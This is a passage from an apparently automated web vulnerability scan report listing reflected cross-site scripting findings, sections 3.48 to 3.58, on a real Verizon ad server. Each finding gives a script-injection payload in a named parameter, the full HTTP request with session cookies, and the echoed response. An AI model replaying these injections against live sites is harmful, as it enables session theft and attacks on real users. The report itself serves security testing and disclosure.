<IFRAME SRC="http://ad.doubleclick.net/adi/N3285.verizon/B2343920.19;sz=300x250;click0=http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/dd200"a="b"4f3fa442ed1/L24/276647423/UNKNOWN/VDSL/LMB_NAF_RON_300_2010_11_01/LowerMyBills_NAF_vznews_300_2009-06.html/726e6f58326b7a6e4b45494141693565?;ord=276647423?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPAC
...[SNIP]...

3.48. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b232"><script>alert(1)</script>05b5cc07ece was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top6b232"><script>alert(1)</script>05b5cc07ece?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:01:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 351
Content-Type: text/html
Cache-Control: private
Content-Length: 351

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/623428622/Top6b232"><script>alert(1)</script>05b5cc07ece/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

3.49. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [audio_conf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497e1"><script>alert(1)</script>829630d20ba was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=497e1"><script>alert(1)</script>829630d20ba&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=497e1"><script>alert(1)</script>829630d20ba&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.50. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [bbaw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c9e"><script>alert(1)</script>de0ed8fa512 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=38c9e"><script>alert(1)</script>de0ed8fa512&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=38c9e"><script>alert(1)</script>de0ed8fa512&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.51. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [connex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9336"><script>alert(1)</script>06f4f26e350 was submitted in the connex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=e9336"><script>alert(1)</script>06f4f26e350&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
755/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=e9336"><script>alert(1)</script>06f4f26e350&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg
...[SNIP]...

3.52. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiostvown parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dde95"><script>alert(1)</script>a822f79e323 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=dde95"><script>alert(1)</script>a822f79e323&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
formA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=dde95"><script>alert(1)</script>a822f79e323&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.53. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiosvoice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37937"><script>alert(1)</script>e02e08d3502 was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=37937"><script>alert(1)</script>e02e08d3502&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:53:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=37937"><script>alert(1)</script>e02e08d3502&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.54. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [msp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b765b"><script>alert(1)</script>85d8bcdeb44 was submitted in the msp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=b765b"><script>alert(1)</script>85d8bcdeb44&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
6e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=b765b"><script>alert(1)</script>85d8bcdeb44&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.55. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebecc"><script>alert(1)</script>f8e5a220c07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&ebecc"><script>alert(1)</script>f8e5a220c07=1 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:59:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1366
Content-Type: text/html
Cache-Control: private
Content-Length: 1366

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&ebecc"><script>alert(1)</script>f8e5a220c07=1" target="_top">
...[SNIP]...

3.56. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [npa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcf3"><script>alert(1)</script>2819918f614 was submitted in the npa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=2dcf3"><script>alert(1)</script>2819918f614&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:53:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
racking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=2dcf3"><script>alert(1)</script>2819918f614&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.57. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [nxx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa3fa"><script>alert(1)</script>c8d299f1c04 was submitted in the nxx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=fa3fa"><script>alert(1)</script>c8d299f1c04&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ng/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=fa3fa"><script>alert(1)</script>c8d299f1c04&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.58. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [online_backup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dcdc"><script>alert(1)</script>690eb2ffc82 was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=4dcdc"><script>alert(1)</script>690eb2ffc82&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
